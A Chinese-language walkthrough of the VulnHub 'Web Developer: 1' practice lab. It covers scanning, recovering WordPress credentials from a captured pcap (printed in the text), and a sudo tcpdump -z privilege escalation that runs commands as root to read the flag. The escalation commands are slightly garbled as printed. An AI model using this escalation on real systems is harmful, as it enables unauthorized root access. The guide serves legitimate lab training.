vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

靶机在192.168.114.129,扫描端口

有网站服务,访问

没什么东西,扫目录

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

这次多出来一个ipdata目录

里面有个cap文件,下载

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

根据sudo -l,我们可以运行tcpdump

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

相关推荐
柴郡猫^O^13 小时前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试
胆大的13 天前
CSRF(跨站请求伪造)
csrf·安全性测试
胆大的15 天前
SQL 盲注(Blind SQL Injection)
数据库·sql·安全性测试
胆大的17 天前
DOM-Based XSS(基于文档对象模型的跨站脚本攻击)
xss·安全性测试
阿部多瑞 ABU23 天前
# 主流大语言模型安全性测试(二):英文越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·自然语言处理·安全性测试
阿部多瑞 ABU1 个月前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
互联网杂货铺1 个月前
功能测试、性能测试、安全测试详解
自动化测试·软件测试·python·功能测试·测试工具·性能测试·安全性测试
澳鹏Appen1 个月前
对抗性提示:大型语言模型的安全性测试
人工智能·语言模型·安全性测试
程序员秘密基地1 个月前
基于python,html,flask,echart,ids/ips,VMware,mysql,在线sdn防御ddos系统
python·网络安全·flask·ddos·安全性测试
菠萝吹雪ing1 个月前
测试用例:质量保障的核心利器
功能测试·程序人生·单元测试·测试用例·学习方法·测试覆盖率·安全性测试